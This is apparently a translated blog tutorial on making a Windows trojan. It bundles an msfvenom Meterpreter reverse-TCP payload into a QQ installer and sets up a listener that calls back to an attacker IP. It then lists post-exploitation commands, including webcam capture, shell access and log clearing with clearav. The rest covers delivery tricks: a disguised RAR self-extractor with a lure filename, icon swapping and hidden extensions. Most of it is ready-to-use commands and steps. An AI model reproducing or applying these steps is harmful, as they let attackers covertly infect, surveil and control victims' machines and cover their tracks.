table of Contents
Bundled Trojan
The Kali linux virtual machine is used here. The
attacker ip is 192.168.0.108. The
target ip is 192.168.177.134
Generate Trojan file
First upload a normal installation package to kali
I downloaded a QQ here and
uploaded it to the root/dy/path
Then start bundling
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe
-p: Specify the following payload
windows/meterpreter/reverse_tcp: Affirm that this is a rebound tcp under a windows system
LHOST=192.168.0.108,: Set the bounced ip, that is, your kali ip address
You can also set the return port, not set here, the default return port is 4444
-f: Represents the file type to be bundled, here is an exe file
-x: Specify the path and file name of the file you want to bundle, here I choose PCQQ2020.exe in root/dy/
-o: Specify the path and file name of the generated Trojan file, here I save it in the original path, the name is QQ.exe
Generated
Attachment: msfvenom introduction
Introduction to msfvenom
msfvenom is a combination of msfpayload and msfencode, which can use msfvenom to generate a Trojan horse program, and execute it on the target machine, and cooperate with meterpreter to monitor the launch locally.
Important parameters of msfvenom: (you can use msfvenom -h to view all parameters)
-p payload设置
-e 编码设置
-a 系统结构,默认x86
-s payload最大大小
-i 编码次数
-f 生成文件格式
msfvenom generation
To generate the payload, there are two necessary options: -pand -f
Use -p to specify the payload to be used.
./msfvenom –l payloads //查看所有msf可用的payload列表
Use -f to specify the output format of the payload
./msfvenom -p windows/meterpreter/bind_tcp -f exe
./msfvenom --help –formats //查看msf支持的输出格式
A typical example of msfvenom use is as follows:
$./msfvenom -p windows/meterpreter/reverse_tcplhost=[Attacker IP]lport=4444 -f exe -o /tmp/my_payload.exe
Introduction to exploit/multi/handler module
msf>use exploit/multi/handler
#使用exploit/multi/handler监听连入的backdoor
msf exploit(handler)>set payload windows/meterpreter/reverse_http
#设置对应的payload。
Msf exploit(handler)>show options
#显示所有的设置如果需要的话,可能还需要将LHOST,LPORT,设置成与payload中相同的地址和端口。
Set monitor bounce
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run
Send Trojan
Next, send the Trojan horse file to the target. As for how to make the target trust you, install the file you sent. It depends on your social work ability.
As a young man who complies with the Network Security Law of the People's Republic of China, I certainly chose to send the Trojan horse file to the virtual machine of another windows system.
First send the Trojan file to the physical machine, and then upload it from the physical machine to the virtual machine
Then double-click to run QQ
kali and it is connected to the target machine
Check the other party's ip
ipconfig
View the other party's directory
dir
Screenshot
screenshot
A picture of the current drone will be taken, and the saved path will be prompted
Turn on the camera
It failed because the virtual machine did not open the camera
Attachment: Meterpreter commonly used commands
info #查看已有模块信息
getuid #查看权限
getpid #获取当前进程的pid
sysinfo #查看目标机系统信息
ps #查看当前活跃进程
kill <PID值> #杀死进程
reboot / shutdown #重启/关机shell #进入目标机cmd shell
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
execute #在目标机中执行文件execute -H -i -f
cmd.exe #创建新进程cmd.exe,-H不可见,-i交互
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中
clearav #清除windows中的应用程序日志、系统日志、安全日志
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
use espia #或者使用espia模块截屏 然后输入screengrab
run vnc #使用vnc远程桌面连接
Further access to permissions
shell
The target host is yours
What if the other party just doesn't download and install the file you sent?
RAR has a self-extracting function.
We can use this to achieve the goal.
There are two files, one is the Trojan file just generated, the other is a txt file,
select all, right click to add to the compressed file, note that you must use rar compression the way
常规里面
The file name can be tempting, such as school girl contact information.txt, where txt is not a file type, but a part of the file name. Its file type is still exe
compression format RAR, choose to create a self-extracting format compression file
高级In the options, there is a self-extracting option. 
Select it.
General: Fill in the unzip path at will, here it is placed in the root directory of the C drive
Settings: Run the txt file before decompression, and run the QQ.exe file after decompression
Mode: hide all information when unzipping
Then confirm, confirm, then confirm
It will extract a file called the contact information of the school girl and
send this file
Also set up the monitor bounce, the same as the first part
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run
When opening this document, the content in the txt file is displayed, but QQ.exe is also secretly executed.
Of course, in the actual situation, you have to change to a lightweight file, otherwise others will doubt if they see a txt file with more than 80 MB.
camouflage
How to pretend to be more like it?
Here is an example of QQ.exe
Introduce two tools
BeCyIconGrabber , this tool can extract file icons.
The icon of a word document is extracted here
Resource Hacker is
a tool that can modify the file icon and
replace its icon with a word document icon
This is the difference between after the icon is changed and before the change.
Because it requires administrator privileges to execute, there is an additional shield mark.
Changing to other files can avoid such situations
Of course, because Microsoft hides the suffix by default, under normal circumstances, non-professionals will not modify it to display the suffix. Therefore, under normal circumstances, the attacker cannot see the suffix. As shown below:
But, what if the suffix is displayed by the attacker?
There are also ways to pretend
to make the file name longer, and Windows will only display a part of the content, and hide the latter part of the file name. as follows:
